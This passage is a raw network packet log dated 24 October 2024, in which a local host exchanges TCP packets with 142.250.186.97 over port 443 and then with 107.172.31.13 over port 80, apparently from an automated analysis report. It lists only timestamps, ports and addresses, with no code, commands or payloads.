                                          Oct 24, 2024 08:59:16.399631023 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.399667978 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.421109915 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.421188116 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.421201944 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.421231031 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.421260118 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.423413038 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.423495054 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.423494101 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.423523903 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.423568010 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.425393105 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.425467014 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.425489902 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.425508976 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.425558090 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.441073895 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.441143990 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.441171885 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.441195011 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.441220045 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.643460989 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.675122976 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.675159931 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.675205946 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.675244093 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.675275087 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.675275087 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.675302029 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.675307989 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.675354958 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.675355911 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.675364017 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.675409079 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.675452948 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.676808119 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.676827908 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.676860094 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.676888943 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.676889896 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.676908016 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.676911116 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.677094936 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.677161932 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.677386999 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.677386999 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.679405928 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.679418087 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.679449081 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.679548025 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.679585934 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.679603100 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.679627895 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.679627895 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.679653883 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.681375027 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.681415081 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.681452036 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.681461096 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.681473017 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.681508064 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.683844090 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.683876991 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.683907986 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.683917046 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.683928967 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.683975935 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.685993910 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.686064005 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.686069012 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.686091900 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.686124086 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.688899994 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.688977003 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.688978910 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.689007044 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.689043045 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.691507101 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.691576958 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.691595078 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.691608906 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.691643000 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.693252087 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.693326950 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.693336010 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.693353891 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.693384886 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.695991039 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.696059942 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.696059942 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.696095943 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.696126938 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.697805882 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.697873116 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.697882891 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.697920084 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.697963953 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.699733019 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.699798107 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.699800014 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.699835062 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.699872971 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.701404095 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.702507019 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.702585936 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.702600956 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.702611923 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.702644110 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.704406023 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.704479933 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.704483032 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.704514027 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.704560995 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.707242966 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.707307100 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.707343102 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.707362890 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.707391024 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.710012913 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.710100889 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.710112095 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.710128069 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.710172892 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.712842941 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.712908030 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.712930918 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.712953091 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.712980986 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.750324011 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.750412941 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.750444889 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.750478029 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.750509024 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.752177000 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.752242088 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.752250910 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.752294064 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.752321959 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.752505064 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:16.752571106 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:16.752767086 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:27.039041042 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.046241045 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.046329975 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.046372890 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.053567886 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.703258038 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.703353882 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.703408957 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.703455925 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.703480959 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.703501940 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.703531981 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.703545094 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.703598022 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.703598976 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.703809023 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.703855038 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.703888893 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.703902960 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.703948975 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.709222078 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.709256887 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.709281921 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.709306002 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.709465981 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.709518909 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.819051027 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.819099903 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.819152117 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.819185019 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.819201946 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.819258928 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.824270010 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.824315071 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.824368954 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.824532986 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.824582100 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.824635029 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.829521894 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.829571009 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.829615116 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.829622030 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.829776049 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.829823971 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.829829931 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.834764004 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.834826946 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.834827900 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.834872961 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.834929943 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.834991932 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.835037947 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.835087061 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.840404987 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.840452909 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.840507984 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.840567112 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.840615034 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.840666056 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.845665932 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.845714092 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.845767021 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.845767021 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.845812082 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.845861912 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.934948921 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.935024023 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.935070038 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.935082912 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.935260057 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.935306072 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.935326099 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.935380936 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.935429096 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.935684919 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.935789108 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.935838938 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.935893059 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.935987949 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.936033964 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.936041117 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.936299086 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.936350107 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.936419964 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.936466932 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.936517000 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.936753035 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.936800003 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.936849117 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.937145948 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.937269926 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.937315941 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.937319994 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.937604904 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.937653065 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.937657118 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.938061953 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.938114882 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.938185930 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.938235044 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.938282013 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.938525915 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.938575029 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.938623905 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.938965082 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.939079046 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.939125061 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.939130068 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.939407110 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.939451933 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.939456940 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.939862013 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.939913988 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.939958096 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.940005064 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.940057039 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.940315008 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.940361977 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.940411091 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.940752983 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.940934896 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.940987110 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.940996885 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.941282034 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.941329002 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.941334009 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.941704988 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.941752911 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.941857100 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.941905975 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.941951036 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.942213058 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.942260027 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.942307949 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.942671061 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.942805052 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.942848921 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.976305008 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.976377010 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.976418972 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.976428986 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:27.976553917 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:27.976610899 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.051163912 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.051261902 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.051310062 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.051322937 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.051562071 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.051608086 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.051608086 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.051847935 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.051894903 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.051896095 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.051942110 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.051985025 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.051985979 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.052032948 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.052082062 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.052638054 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.052685022 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.052727938 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.052730083 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.052983999 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.053028107 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.053030014 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.053076029 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.053117990 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.053119898 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.053165913 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.053208113 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.053925037 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.053987026 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.054025888 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.054032087 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.054069042 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.054114103 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.054115057 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.054158926 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.054203987 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.054204941 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.054703951 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.054749966 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.054749966 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.054796934 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.054838896 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.054841995 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.054886103 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.054929972 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.054932117 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.055603027 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.055649042 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.055660963 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.055694103 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.055738926 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.055741072 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.055783987 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.055825949 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.056509972 CEST8049168107.172.31.13192.168.2.22
